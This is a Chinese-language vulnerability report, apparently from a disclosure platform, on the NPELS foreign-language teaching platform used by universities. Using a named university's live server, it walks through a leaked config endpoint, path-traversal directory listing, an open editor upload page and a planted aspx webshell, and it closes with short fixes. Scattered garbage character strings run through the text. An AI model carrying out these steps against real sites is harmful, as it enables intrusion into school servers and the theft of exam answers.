新理念外语网络教学平台文件上传漏洞

admin

好多大学都在用这个教学平台，这个漏洞会导致直接拿到试题答案，甚至作为跳板继续渗透进入学校其他服务器中

详细说明：

0 B: H/ k+ \6 o8 Y2 ]8 A; t以南开大学的为例:
http://222.30.60.3/NPELS
9 F) P. y' K4 H) C; `$ VNPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
</setting>
  f# L/ p6 m' q  A* d及版本号
<add key="TVersion" value="1, 0, 0, 2187">
</add>
直接访问
http://222.30.60.3/NPELS/CommonService.asmx
使用GetTestClientFileList操作，直接 HTTP GET 列目录：
0 b4 _4 E. A! `; f) e- Ohttp://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
进一步列目录（返回的网页很大，可以直接 wget 下来）
http://222.30.60.3/NPELS/CommonS ... List?version=../../
0 o/ h9 d, f, Y1 ~- V6 {5 ]: p3 x
发现
! J  h) M+ T) W) t7 Z1 w8 n# bhttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
5 P  ~9 G* {7 R' Z1 \2 Y可以上传，直接上传aspx木马即可，不需要改后缀名或者文件头
上传后继续列目录找到木马地址直接访问即可

0 P* j+ c, \+ i! g: ROOXX
+ J. e$ o6 }7 H* }; n8 _/ U
; c) E8 q' a+ W9 z: PGoogle "新理念外语网络教学平台" 测试了几个其他的站，都有类似的列目录上传方法
; c! w' ]' G& T6 p/ ]' J) \漏洞证明：

0 p: ?: t; h3 M, [; x" v8 u列目录：
http://222.30.60.3/NPELS/CommonS ... List?version=../../
0 M* e" ?- q5 ?$ ~. O文件上传：
2 H. l3 U- ^. M5 P0 ehttp://222.30.60.3/npelsv/editor/editor.htm
5 v' j# C$ ]- Z/ I/ N% v
" Z' ~- s: A8 Y上传木马：
# n0 M# K' a8 t4 _8 H! Chttp://222.30.60.3/npelsv/editor/uploadfiles/1.aspx

修复方案：
6 F1 [% t' p! U' B2 u' u好像考试系统必须使用 CommonService.asmx
最好配置文件加密或者用别的方式不让它泄露出来
并且检查或删除各上传入口，像 http://222.30.60.3/NPELS/Upload.aspx 一样​
# e0 b: u9 v4 k5 H